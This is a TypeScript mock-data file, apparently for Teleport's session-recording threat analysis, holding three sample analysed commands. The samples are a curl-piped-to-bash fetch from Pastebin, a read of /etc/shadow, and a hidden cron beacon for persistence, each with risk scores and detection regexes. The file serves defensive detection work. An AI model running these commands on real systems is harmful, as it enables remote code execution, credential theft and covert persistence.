import {
  CommandCategory,
  ThreatCategory,
  type CommandAnalysis,
} from 'e-teleport/services/recordings/types';
import { RiskLevel } from 'teleport/services/recordings';

export const MOCK_COMMANDS: CommandAnalysis[] = [
  {
    command: 'curl -s https://pastebin.com/raw/abc123 | bash',
    category: CommandCategory.Network,
    success: true,
    riskLevel: RiskLevel.Critical,
    riskScore: 95,
    threatCategory: ThreatCategory.Execution,
    timelineTitle: 'Remote Script Execution',
    timelineSubtitle: 'Downloaded and executed external payload',
    shortDescription: 'Fetched and executed a remote script from Pastebin',
    detailedDescription:
      'The attacker downloaded a script from a known paste site and piped it directly to bash for execution, bypassing any local file creation that could be detected.',
    errorMessages: [],
    suspiciousFlags: ['pipe_to_shell', 'external_url', 'paste_site'],
    sensitiveItems: [],
    suspiciousPatterns: ['curl.*\\|.*bash', 'pastebin\\.com'],
    indicatorOfCompromise: ['pastebin.com/raw/abc123'],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 1000,
    endOffset: 2000,
  },
  {
    command: 'cat /etc/shadow',
    category: CommandCategory.DataAccess,
    success: false,
    riskLevel: RiskLevel.High,
    riskScore: 78,
    threatCategory: ThreatCategory.CredentialAccess,
    timelineTitle: 'Shadow File Access Attempt',
    shortDescription: 'Attempted to read password hashes',
    detailedDescription:
      'The user attempted to access the shadow file containing password hashes. The operation failed due to insufficient permissions.',
    errorMessages: ['Permission denied'],
    suspiciousFlags: ['credential_file_access'],
    sensitiveItems: ['/etc/shadow'],
    suspiciousPatterns: ['cat.*/etc/shadow'],
    indicatorOfCompromise: [],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: false,
    startOffset: 2500,
    endOffset: 3000,
  },
  {
    command: 'echo "* * * * * /tmp/.hidden/beacon.sh" | crontab -',
    category: CommandCategory.SystemConfiguration,
    success: true,
    riskLevel: RiskLevel.Critical,
    riskScore: 92,
    threatCategory: ThreatCategory.Persistence,
    timelineTitle: 'Cron Persistence Installed',
    timelineSubtitle: 'Hidden script scheduled for execution',
    shortDescription: 'Added a hidden script to crontab for persistence',
    detailedDescription:
      'A cron job was installed that executes a hidden beacon script every minute. The script location in /tmp with a dot-prefixed directory suggests intentional concealment.',
    errorMessages: [],
    suspiciousFlags: [
      'crontab_modification',
      'hidden_directory',
      'tmp_execution',
    ],
    sensitiveItems: [],
    suspiciousPatterns: ['crontab', '/tmp/\\.', 'beacon'],
    indicatorOfCompromise: ['/tmp/.hidden/beacon.sh'],
    hasSensitiveData: false,
    privilegeEscalation: false,
    dataExfiltration: false,
    persistence: true,
    startOffset: 4000,
    endOffset: 4500,
  },
];
